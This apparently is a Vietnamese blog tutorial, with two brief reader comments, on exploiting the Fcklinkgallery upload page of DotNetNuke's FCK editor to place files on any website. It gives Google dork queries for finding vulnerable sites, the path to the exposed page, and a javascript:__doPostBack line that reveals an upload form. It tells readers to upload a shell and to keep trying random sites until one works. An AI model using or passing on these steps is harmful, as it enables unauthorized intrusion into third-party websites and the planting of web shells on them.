Tương tự như Fckeditor thì dòng họ FCK này bị thêm 1 anh nửa đó là Fcklinkgallery. Hôm nay mình tiếp tục hướng dẫn các bạn tiếp cách Khai thác lỗi Fcklinkgallery để Up File lên một website bất kỳ.
Bước 1: Sử dụng trình duyệt Firefox Vào Google gõ lệnh
inurl:/tabid/36/language/en-US/Default.aspx
hoặc
inurl:fcklinkgallery.aspx
hoặc
inurl:/portals/0
Cách nhanh nhất là vào các link dưới đây
Bước 2:
Chọn 1 vài site bất kỳ truy cập vào và thay đường dẫn thành
http://tênwebsite.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
Bước 3:
Nếu xuất hiện được bảng này thì thành công 50%
Bước 4:
Check vào dòng thứ 3 File (Un File di questo sito)
Bước 5: Xóa hết chữ trên thanh địa chỉ (address) của trình duyệt, dán đoạn script này vào và nhấn Enter
javascript:__doPostBack('ctlURL$cmdUpload','')
Bước 6: Ở dưới sẽ xuất hiện 1 khung cho ta upload file. Nhấn Browse… để chọn file (shell) up lên
Bước 7: Up gì tùy bạn,hee
Làm 1 lần không được thì tìm website khác làm, thử chừng chục cái sẽ ra được 1 cái.
Làm gì cũng cần kiên nhẫn nhé các bạn
2 Comments
omg
ReplyDeletehay
ReplyDelete